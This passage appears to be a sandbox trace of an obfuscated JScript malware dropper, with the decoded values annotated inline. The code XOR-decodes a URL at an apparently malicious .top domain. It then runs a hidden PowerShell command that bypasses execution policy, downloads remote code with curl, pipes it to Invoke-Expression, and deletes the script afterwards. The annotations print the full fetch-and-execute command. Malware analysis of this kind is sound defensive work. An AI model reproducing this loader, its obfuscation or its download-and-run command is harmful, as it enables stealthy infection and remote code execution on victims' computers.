            KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld += 1;
        }
        return KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr;
    } ( ) ) ;
var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxg7uAlKgcsdf = KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.ExpandEnvironmentStrings ( "%APPDATA%" ) + "\\JW3VUNHU.ps1";
  • ExpandEnvironmentStrings("%APPDATA%") ➔ "C:\Users\hubert\AppData\Roaming"
var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7 = "72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19";
function sh25wWm2Gmp2() {
  • sh25wWm2Gmp2() ➔ "http://nzy3tvbb72g3.top/1.php?s=mints13"
    var script1 = JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7.split ( ',' );
      • "72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19".split(",") ➔ 72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19
    var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2 = [];
    var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx = '';
    for ( var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = 0 ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM < script1.length ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM ++ )
    {
        yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2.push ( String.fromCharCode ( script1[yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM] ^ ( 0xa * 0x3 + 0.5 * 4 ) ) );
    }
    for ( var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = 0 ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM < yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2.length ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM ++ )
    {
        JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx += yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2[yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM];
    }
    return JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx;
}
var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO = [ 0x43 + 0x87, 0x73 + 0x87, 0x62 + 0x87, 0x79 + 0x87, 0x60 + 0x87, 0x64 + 0x87, 0x79 + 0x87, 0x7e + 0x87, 0x77 + 0x87, 0x3e + 0x87, 0x56 + 0x87, 0x79 + 0x87, 0x7c + 0x87, 0x75 + 0x87, 0x43 + 0x87, 0x69 + 0x87, 0x63 + 0x87, 0x64 + 0x87, 0x75 + 0x87, 0x7d + 0x87, 0x5f + 0x87, 0x72 + 0x87, 0x7a + 0x87, 0x75 + 0x87, 0x73 + 0x87, 0x64 + 0x87 ];
var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl = [ 0x11d + 0xbe, 0x102 + 0xbe, 0x11a + 0xbe, 0x108 + 0xbe, 0x11f + 0xbe, 0x11e + 0xbe, 0x105 + 0xbe, 0x108 + 0xbe, 0x101 + 0xbe, 0x101 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x103 + 0xbe, 0x102 + 0xbe, 0x11d + 0xbe, 0x11f + 0xbe, 0x102 + 0xbe, 0x10b + 0xbe, 0x104 + 0xbe, 0x101 + 0xbe, 0x108 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x108 + 0xbe, 0x115 + 0xbe, 0x108 + 0xbe, 0x10e + 0xbe, 0x118 + 0xbe, 0x119 + 0xbe, 0x104 + 0xbe, 0x102 + 0xbe, 0x103 + 0xbe, 0x11d + 0xbe, 0x102 + 0xbe, 0x101 + 0xbe, 0x104 + 0xbe, 0x10e + 0xbe, 0x114 + 0xbe, 0x14d + 0xbe, 0x10f + 0xbe, 0x114 + 0xbe, 0x11d + 0xbe, 0x10c + 0xbe, 0x11e + 0xbe, 0x11e + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x13a + 0xbe, 0x104 + 0xbe, 0x103 + 0xbe, 0x109 + 0xbe, 0x102 + 0xbe, 0x11a + 0xbe, 0x13e + 0xbe, 0x119 + 0xbe, 0x114 + 0xbe, 0x101 + 0xbe, 0x108 + 0xbe, 0x14d + 0xbe, 0x105 + 0xbe, 0x104 + 0xbe, 0x109 + 0xbe, 0x109 + 0xbe, 0x108 + 0xbe, 0x103 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x12e + 0xbe, 0x14d + 0xbe, 0x14f + 0xbe, 0x14d + 0xbe, 0x10e + 0xbe, 0x118 + 0xbe, 0x11f + 0xbe, 0x101 + 0xbe, 0x14d + 0xbe, 0x138 + 0xbe, 0x13f + 0xbe, 0x121 + 0xbe, 0x14d + 0xbe, 0x111 + 0xbe, 0x104 + 0xbe, 0x108 + 0xbe, 0x115 + 0xbe, 0x14f + 0xbe ];
function KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() {
  • KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() ➔ 112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34
    var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1 = [];
    var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg = 0;
    while (KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg < KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl.length )
    {
        KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1.push ( ( KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl[KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg] - 0xbe ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[4] );
        KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg ++;
    }
    return KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1;
}
KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.Run ( String.fromCharCode.apply ( null, KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc ( ) ).replace ( "U" + String.fromCharCode ( 0x43 ^ 17 ) + String.fromCharCode ( 0x55 ^ 25 ), sh25wWm2Gmp2 ( ) ) );
  • KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() ➔ 112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34
  • function fromCharCode().apply(null,112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34) ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""
                                                                                                                                                                                    • sh25wWm2Gmp2() ➔ "http://nzy3tvbb72g3.top/1.php?s=mints13"
                                                                                                                                                                                    • Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"") ➔ 0
                                                                                                                                                                                    43
                                                                                                                                                                                    var g7uAlKgc = WScript.CreateObject (
                                                                                                                                                                                    • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                                                                    44
                                                                                                                                                                                    function () {
                                                                                                                                                                                    • () ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                    • () ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                    45
                                                                                                                                                                                    var Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1 = "";
                                                                                                                                                                                      46
                                                                                                                                                                                      for ( var Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc = 0 ; Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc < yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.length ; Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc ++ )
                                                                                                                                                                                        47
                                                                                                                                                                                        {
                                                                                                                                                                                          48
                                                                                                                                                                                          Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1 += String.fromCharCode ( ( yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO[Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc] - 0x87 ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[5] );
                                                                                                                                                                                            49
                                                                                                                                                                                            }
                                                                                                                                                                                              50
                                                                                                                                                                                              return Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1;
                                                                                                                                                                                                51
                                                                                                                                                                                                } ( ) ) ;
                                                                                                                                                                                                  52
                                                                                                                                                                                                  g7uAlKgc.DeleteFile ( WScript.ScriptFullName );
                                                                                                                                                                                                  • DeleteFile("C:\Users\hubert\Desktop\FM5vWQHpqe.js") ➔ undefined